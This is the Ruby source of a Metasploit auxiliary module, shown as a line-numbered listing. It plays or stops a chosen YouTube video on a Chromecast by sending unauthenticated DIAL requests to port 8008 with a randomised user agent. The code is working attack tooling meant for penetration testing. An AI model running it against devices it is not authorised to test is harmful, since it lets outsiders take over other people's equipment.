Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info = {})
10
    super(update_info(info,
11
      'Name' => 'Chromecast YouTube Remote Control',
12
      'Description' => %q{
13
        This module acts as a simple remote control for Chromecast YouTube.
14

15
        Only the deprecated DIAL protocol is supported by this module.
16
        Casting via the newer CASTV2 protocol is unsupported at this time.
17
      },
18
      'Author' => ['wvu'],
19
      'References' => [
20
        ['URL', 'http://www.google.com/intl/en/chrome/devices/chromecast/index.html'] # vendor website
21
      ],
22
      'License' => MSF_LICENSE,
23
      'Actions' => [
24
        ['Play', 'Description' => 'Play video'],
25
        ['Stop', 'Description' => 'Stop video']
26
      ],
27
      'DefaultAction' => 'Play'
28
    ))
29

30
    register_options([
31
      Opt::RPORT(8008),
32
      OptString.new('VID', [true, 'Video ID', 'kxopViU98Xo'])
33
    ])
34
  end
35

36
  def run
37
    vid = datastore['VID']
38

39
    case action.name
40
    when 'Play'
41
      res = play(vid)
42
    when 'Stop'
43
      res = stop
44
    end
45

46
    return unless res
47

48
    case res.code
49
    when 201
50
      print_good("Playing https://www.youtube.com/watch?v=#{vid}")
51
    when 200
52
      print_status('Stopping video')
53
    when 404
54
      print_error('Target no longer supports casting via the DIAL protocol. ' \
55
                  'CASTV2 is not supported by this module at this time.')
56
    end
57
  end
58

59
  def play(vid)
60
    begin
61
      send_request_cgi(
62
        'method' => 'POST',
63
        'uri' => '/apps/YouTube',
64
        'agent' => Rex::Text.rand_text_english(rand(42) + 1),
65
        'vars_post' => {
66
          'v' => vid
67
        }
68
      )
69
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
70
           Rex::HostUnreachable => e
71
      fail_with(Failure::Unreachable, e)
72
    ensure
73
      disconnect
74
    end
75
  end
76

77
  def stop
78
    begin
79
      send_request_raw(
80
        'method' => 'DELETE',
81
        'uri' => '/apps/YouTube',
82
        'agent' => Rex::Text.rand_text_english(rand(42) + 1)
83
      )
84
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
85
           Rex::HostUnreachable => e
86
      fail_with(Failure::Unreachable, e)
87
    ensure
88
      disconnect
89
    end
90
  end
91
end
92

93